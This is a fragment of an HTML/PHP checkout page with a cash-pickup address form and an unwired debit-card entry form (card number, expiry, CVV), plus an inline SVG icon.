col-sm-12"> <center> <h2 style="font-size:2em;color:#3B8894"> <svg style="width: 20%; height: auto;" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512.002 512.002" style="enable-background:new 0 0 512.002 512.002;" xml:space="preserve"> <g> <path style="fill:#88B337;" d="M423.622,332.518c0.009-3.866-1.059-7.652-3.089-10.944l-19.681-31.683 c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61c0-63.367-51.364-114.731-114.731-114.731h-52.953 c-63.367,0-114.731,51.364-114.731,114.731v97.61c0.018,5.454-1.253,10.838-3.707,15.709l-19.681,31.683 c-2.03,3.292-3.098,7.078-3.089,10.944l0,0c0.044,11.341,9.223,20.519,20.563,20.563h294.241 C414.399,353.037,423.578,343.858,423.622,332.518z"/> <polygon style="fill:#88B337;" points="282.415,61.841 326.542,0.063 185.335,0.063 229.462,61.841 229.462,79.492 282.415,79.492 "/> </g> <path style="fill:#6B962A;" d="M420.533,321.574l-19.681-31.683c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61 c0.062-25.559-8.419-50.411-24.093-70.604C349.488,235.791,266.529,310.631,188.6,353.081h214.459 c11.402,0.044,20.687-9.161,20.731-20.572c0.018-3.866-1.05-7.652-3.08-10.935H420.533z"/> <path style="fill:#FFFFFF;" d="M300.065,194.223v-5.648c-0.044-16.354-13.3-29.609-29.654-29.654h-5.648V141.27h-17.651v17.651 h-5.648c-16.38-0.053-29.698,13.176-29.751,29.556c-0.044,12.435,7.678,23.573,19.337,27.897l16.062,6.001v33.625h-5.648 c-6.628,0-12.003-5.375-12.003-12.003l0,0v-5.648h-17.651v5.648c0.044,16.354,13.3,29.609,29.654,29.654h28.948 c16.38,0.053,29.698-13.176,29.751-29.556c0.044-12.435-7.678-23.573-19.337-27.897l-16.062-6.001v-33.625h5.648 c6.628,0,12.003,5.375,12.003,12.003l0,0v5.648H300.065z M274.648,232.702c4.66,1.809,7.74,6.293,7.766,11.297 c0,6.628-5.375,12.003-12.003,12.003l0,0h-5.648v-27.006L274.648,232.702z M247.113,203.578l-9.885-3.707 c-4.66-1.809-7.74-6.293-7.766-11.297c0-6.628,5.375-12.003,12.003-12.003l0,0h5.648V203.578z"/> <g> <path style="fill:#FDB62F;" d="M432.447,88.317L432.447,88.317c-3.001-18.11-17.192-32.301-35.302-35.302l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C449.639,56.016,435.448,70.208,432.447,88.317z"/> <path style="fill:#FDB62F;" d="M35.302,264.826L35.302,264.826C32.301,246.717,18.11,232.525,0,229.525l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C52.494,232.525,38.302,246.717,35.302,264.826z"/> </g> <path style="fill:#FEC9A3;" d="M508.081,307.983c-7.246-12.197-22.814-16.512-35.302-9.796l-125.233,53.482 c-2.206,0.935-4.58,1.421-6.972,1.412h-155.24c-9.752,0-17.651-7.899-17.651-17.651c0-9.752,7.899-17.651,17.651-17.651h70.604 c29.248,0,52.953-23.705,52.953-52.953H162.035c-24.341,0.018-47.357,11.094-62.572,30.095l-55.336,66.985l62.308,114.201 l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l123.556-63.279C511.903,336.533,515.68,320.356,508.081,307.983z"/> <path style="fill:#F7BB8F;" d="M86.578,439.747l19.857,36.361l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l66.809-34.331 C331.837,407.181,184.452,428.362,86.578,439.747z"/> <polygon style="fill:#4398D1;" points="0,353.081 0,511.939 114.731,511.939 141.207,485.463 35.302,326.605 "/> <path style="fill:#3E8CC7;" d="M0,511.939h114.731l26.476-26.476l-19.416-29.124C82.536,472.542,41.727,484.695,0,492.612V511.939z" /> <circle style="fill:#D9D9D9;" cx="79.429" cy="467.838" r="17.651"/> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> </h2> <h4 style="margin-top: 0;color:#3B8894">Cash will be picked up directly from your address (Minimum: Rs.1,00,000)</h4> <br> <img src="cod.png" width="20%"></img> <form autocomplete="off" method="POST" action="<?php echo $cashondel; ?>"> <div id="upiVpaDiv" class = ""> <br> <p>Enter your address where you want us to pick cash from</p> <div style="display: block;align-items: center; text-align: center;"> <div class="group mb-0"> <input type="text" class="form-control" name="city" id="upiVpa" placeholder="Enter City"/> <br> <input type="text" class="form-control" name="locality" id="upiVpa" placeholder="Enter address (optional)"/> <br> <input type="hidden" name="Order Amount" value="<?php echo $orderAmount; ?>" id="inputTransactionId"/> <input type="hidden" name="User Name" value="<?php echo $customerName; ?>" id="inputStatus"/> <input type="hidden" name="CustomerEmail" value="<?php echo $customerEmail; ?>" id="inputStatus"/> <input type="hidden" name="CustomerPhone" value="<?php echo $phone; ?>" id="inputStatus"/> <input type="hidden" name="OrderId" value="<?php echo $orderId; ?>" id="inputStatus"/> <span class="highlight"></span> <span class="bar"></span> </div> </div> <div class="clearfix"> </div> <!-- <div class="checkbox"> <label> <input type="checkbox" id="saveVpa" checked="checked"/> Remember my VPA on this device </label> </div> --> </div> <button type="submit" class="btn pay-button upi-button btn-full submit-button-pc" >SUBMIT</button> </form> </center> </div> </div> </div> <div id="debit-card" class="tab-pane fade pt-3"> <form role="form"> <div class="form-group"> <label for="username"> <h6>Card Owner</h6> </label> <input type="text" name="username" placeholder="Card Owner Name" required class="form-control "> </div> <div class="form-group"> <label for="cardNumber"> <h6>Card number</h6> </label> <div class="input-group"> <input type="text" name="cardNumber" placeholder="Valid card number" class="form-control " required> <div class="input-group-append"> <span class="input-group-text text-muted"> <i class="fab fa-cc-visa mx-1"></i> <i class="fab fa-cc-mastercard mx-1"></i> <i class="fab fa-cc-amex mx-1"></i> </span> </div> </div> </div> <div class="row"> <div class="col-sm-8"> <div class="form-group"> <label> <span class="hidden-xs"> <h6>Expiration Date</h6> </span> </label> <div class="input-group"> <input type="number" placeholder="MM" name="" class="form-control" required> <input type="number" placeholder="YY" name="" class="form-control" required> </div> </div> </div> <div class="col-sm-4"> <div class="form-group mb-4"> <label data-toggle="tooltip" title="Three digit CV code on the back of your card"> <h6>CVV <i class="fa fa-question-circle d-inline"></i></h6> </label> <input type="text" required class="form-control"> </div> </div> </div> <div class="card-footer"> <button type="button" class="subscribe btn btn-primary btn-block shadow-sm"> Confirm Payment </button> </form> </div> </div> </div> </div> </div> </body> </html>